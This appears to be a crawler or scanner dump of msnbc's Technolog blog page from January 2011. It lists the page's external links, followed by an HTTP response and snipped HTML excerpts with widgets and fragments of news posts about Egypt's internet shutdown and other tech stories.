http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5935542-mysterious-roy-castillo-haunts-facebook
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5935983-dont-worry-wi-fi-only-tablets-are-coming
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5940731-kindle-books-now-outsell-paperbacks
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5940742-pre-caffeine-tech-man-vs-the-internet
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5940974-facebook-deprived-man-sues-for-500k
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941456-infograph-egypt-drops-off-the-internet
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941852-this-is-about-social-networks-that-are-beyond-the-reach-of-mubarak
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941854-is-internet-access-a-human-right
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://worldblog.msnbc.redacted/_news/2011/01/27/5936053-watching-egypts-protests?chromedomain=technolog
http://www.facebook.com/technolog
http://www.facebook.com/terms.php
http://www.facebook.com/todd.kenreck
http://www.facebook.com/topic.php?uid=31987371885&topic=14747&post=70129
http://www.facebook.com/topic.php?uid=31987371885&topic=14769
http://www.flickr.com/photos/aljazeeraenglish/
http://www.geekpress.com/
http://www.google.com/
http://www.guardian.co.uk/world/blog/2011/jan/27/egypt-protests
http://www.habitablezone.com/space/
http://www.herdict.org/web/
http://www.hobbyspace.com/
http://www.hotmail.com/
http://www.humanrightsfirst.org/
http://www.livescience.com/
http://www.macrumors.com/2011/01/26/verizon-iphone-pre-orders-to-start-at-3am-et-on-february-3rd-offering-atandt-trade-ins/
http://www.mobilecrunch.com/2011/01/27/the-elusive-white-iphone-appears-on-the-german-apple-website/
http://www.mobileworldcongress.com/
http://www.nasaspaceflight.com/
http://www.nasawatch.com/
http://www.newsvine.com/
http://www.nydailynews.com/ny_local/2011/01/26/2011-01-26_man_sues_facebook_claiming_socialnetworking_site_shut_down_his_account_for_no_re.html
http://www.nypost.com/f/print/news/local/staten_island/si_man_hits_facebook_with_suit_rMmqxdBwUg9UJpHI8WIDIK
http://www.nypost.com/p/news/local/manhattan/antisocial_network_WIiiaZ4tHPBHHlXx4GuG5I
http://www.outofthecradle.net/
http://www.pitpi.org/
http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247
http://www.polls.newsvine.com/_static/css/ffb30d0d6c6ea0fa18ad06ed093685a55fe064e8.css?v=23247
http://www.polls.newsvine.com/_static/js/6fcc5bd2a149dc02951529f95ade36053a0ff882.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg
http://www.polls.newsvine.com/_vine/images/users/600/athima-chansanchai/5941352.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5936454.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5941467.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942421.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg
http://www.polls.newsvine.com/_vine/images/users/600/wbenedetti/5932923.jpg
http://www.polls.newsvine.com/_vine/images/users/600/wbenedetti/5933512.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5940889.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5941146.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5941346.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5934467.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5935650.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5936378.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5940823.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/suzanne-choney/5925431.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/suzanne-choney/5927180.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/wbenedetti/5927996.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml
http://www.scidev.net/
http://www.scienceblog.com/cms/index.php
http://www.scienceblogs.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.space.com/
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.spotonpr.com/egypt-facebook-demographics/
http://www.state.gov/secretary/rm/2010/01/135519.htm
http://www.telegraph.co.uk/news/worldnews/europe/russia/8284279/Black-Widow-attempted-New-Year-Moscow-attack-but-blew-herself-up-by-mistake.html
http://www.thecaseforpluto.com/
http://www.thecaseforpluto.com/cover.jpg
http://www.thespacereview.com/
http://www.transterrestrial.com/
http://www.twitter.com/MAlexJohnson
http://www.twitter.com/suzannechoney
http://www.twitter.com/wjrothman
http://www.unmannedspaceflight.com/
http://www.urlesque.com/2011/01/27/bear-grylls-vs-les-stroud/
http://www.urlesque.com/2011/01/27/old-spice-guy-isaiah-mustafa-back/
http://www.vodafone.com/content/index/press.html
http://www.wired.com/threatlevel/2011/01/fbi-anonymous/
http://www.wolframalpha.com/
http://www.youtube.com/
http://www.youtube.com/results?search_query=egypt+protest+2011&aq=0sx
http://www.youtube.com/results?search_query=mubarak+protest&aq=f
http://www.youtube.com/v/12rNbGf2Wwo&hl=en_US&fs=1
http://www.youtube.com/v/JORCXkSKvf0&hl=en_US&fs=1
http://www.youtube.com/v/Jjd6CGckke0&hl=en_US&fs=1
http://www.youtube.com/v/YtTUsqra-MU&hl=en_US&fs=1
http://www.youtube.com/v/q_AF1t1KeZ8&hl=en_US&fs=1
http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1
http://www.youtube.com/v/xnQgaMOZLRc&hl=en_US&fs=1
http://www.youtube.com/watch?v=4L-ueFdKzjc&feature=player_embedded
http://www.youtube.com/watch?v=YtTUsqra-MU
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://twitter.com/ToddKenreck
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=288
Date: Sun, 30 Jan 2011 18:43:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 243536

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/ffb30d0d6c6ea0fa18ad06ed093685a55fe064e8.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/6fcc5bd2a149dc02951529f95ade36053a0ff882.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=53290623&do=msnbc.redacted&ad=53:9:80;44::;56:27:108;58:58:178;58:58:178;58:58:178;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<p>"If you go beyond the weekend, real damage is done to capital flow and banking," Neil Hicks, international policy analyst for <a href="http://www.humanrightsfirst.org/">Human Rights First</a> told msnbc.com, citing a report from the <a href="http://www.eiu.com/public/">Economist Intelligence Unit</a>
...[SNIP]...
<p>It's counterproductive, Hicks explained, citing Secretary of State Hillary Clinton's <a href="http://www.state.gov/secretary/rm/2010/01/135519.htm">January 21 speech on Internet freedom</a>
...[SNIP]...
<p>"We've never had a lab in which to see what percentage of a country's economy relies on the Internet," Jim Cowie, chief technology officer of the global Internet monitoring firm <a href="http://renesys.com/about/index.shtml">Renesys</a>
...[SNIP]...
<em>Catch up with Wilson on Twitter at <a href="http://www.twitter.com/wjrothman">@wjrothman</a>, or join our conversation at the <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday" data-Text="Net-less Egypt may face economic doom Monday">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo … T-Pain really likes Facebook too … at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" />
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5942421" data-contentId="5942421" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942421.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942421.jpg" width="600" height="339" alt="" />
...[SNIP]...
<em><a href="http://techcrunch.com/2011/01/28/egypt/">via TechCrunch</a>
...[SNIP]...
<div id="vine-inlineCode__5942398" class="inlineCode photo_align_block" data-contentid="5942398"><script src="http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630"></script>
...[SNIP]...
<em>Join the coversation on our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution" data-Text="Jon Stewart questions Egypt's 'Twitter revolution'">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>A spam message wishing a Russian woman happy new year may very well have killed her, and saved hundreds of intended targets, according to an account by <a target="_blank" href="http://www.telegraph.co.uk/news/worldnews/europe/russia/8284279/Black-Widow-attempted-New-Year-Moscow-attack-but-blew-herself-up-by-mistake.html">The Telegraph's Moscow correspondent, Andrew Osborn</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber" data-Text="Did spam text kill a Russian suicide bomber?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>The vast majority of urban Egyptians, 78 percent, feel that it is, according to a <a href="http://news.bbc.co.uk/2/hi/8548190.stm">BBC World Service survey</a>
...[SNIP]...
<p class="p1">"It's freedom of expression that is a long-standing core right," Neil Hicks, international policy adviser for <a href="http://www.humanrightsfirst.org/">Human Rights First</a>
...[SNIP]...
<p class="p1">Outrage around the world centers on this issue. Cynthia Wong, international project director for the <a href="http://www.cdt.org/">Center for Democracy & Technology</a>
...[SNIP]...
<p class="p1">But when <a href="http://gizmodo.com/5745478/is-internet-access-a-human-right">the same question was posed by our friend Joel Johnson on the tech blog Gizmodo</a>
...[SNIP]...
<em>Catch up with Wilson on Twitter at <a href="http://www.twitter.com/wjrothman">@wjrothman</a>, or join our conversation at the <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941854-is-internet-access-a-human-right" data-Text="Is Internet access a human right?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941854-is-internet-access-a-human-right" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>"Under Egyptian legislation the authorities have the right to issue such an order and we are obliged to comply with it," Vodafone, one of the largest cell phone carriers, in Egypt, <a href="http://www.vodafone.com/content/index/press.html" target="_blank" class="vt-p">said in a statement</a>
...[SNIP]...
means because "what the government does is very effective for stopping the most basic users, meaning average users, the folks who probably aren't Twitter users," says Philip N. Howard, director of the <a href="http://www.pitpi.org/" target="_blank" class="vt-p">Project on Information Technology and Political Islam</a>
...[SNIP]...
<strong><a class="vt-p" target="_blank" href="http://twitter.com/malexjohnson">Follow M. Alex Johnson on Twitter</a>
...[SNIP]...
<strong><a class="vt-p" target="_blank" href="http://www.facebook.com/pages/Alex-Johnson-msnbccom/136854296350964">Follow M. Alex Johnson on Facebook</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941852-this-is-about-social-networks-that-are-beyond-the-reach-of-mubarak" data-Text="'This is about social networks that are beyond the reach of Mubarak'">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941852-this-is-about-social-networks-that-are-beyond-the-reach-of-mubarak" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5941352" data-contentId="5941352" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="athima-chansanchai/5941352.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/athima-chansanchai/5941352.jpg" width="600" height="400" alt="" /><p class="photo_credit">
...[SNIP]...
<div id="vine-inlinePhoto__5941346" data-contentId="5941346" class="inlinePhoto photo_portrait photo_align_right user_inline_photo" style="width:280px;"><img id="athima-chansanchai/5941346.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5941346.jpg" width="280" height="420" alt="" /><div class="photo_credit_container">
...[SNIP]...
</a>, hoping the world won't see more photos like these (from <a href="http://www.flickr.com/photos/aljazeeraenglish/" target="_blank">Al Jazeera's Flickr photostream</a>
...[SNIP]...
<p>Searching for <a href="http://www.youtube.com/results?search_query=mubarak+protest&aq=f" target="_blank">"Mubarak protest" on YouTube will yield hundreds of videos</a>, several taken in the last few days by news crews embedded in Egypt, as will "<a href="http://www.youtube.com/results?search_query=egypt+protest+2011&aq=0sx" target="_blank">Egypt Protest 2011</a>
...[SNIP]...
<p>This video comes via a collection put together by <a href="http://mashable.com/2011/01/27/youtube-flickr-show-escalating-violence-in-egyptian-protests/" target="_blank">Mashable</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/JORCXkSKvf0&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<p>And while attempts have been made to stifle Twitter and Facebook feeds, undeniable proof of the protests continue to come through, like this video, which I found from a Twitter link that led to a <a href="http://www.facebook.com/anarchismnews/posts/180233175348223" target="_blank">Facebook page</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/xnQgaMOZLRc&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/q_AF1t1KeZ8&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see" data-Text="What the Egyptian government doesn't want you to see">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5941467" data-contentId="5941467" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5941467.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5941467.jpg" width="600" height="450" alt="" />
...[SNIP]...
startling efficiency with which a government can isolate a country that has few telecom providers. The action is also far and above any previous any Internet shutdown connected to political unrest, as <a href="http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml">Jame's Cowie points out in the Renesys blog</a>
...[SNIP]...
<em><a href="http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml">Renesys</a> via <a href="http://www.businessinsider.com/sai">Business Insider</a>
...[SNIP]...
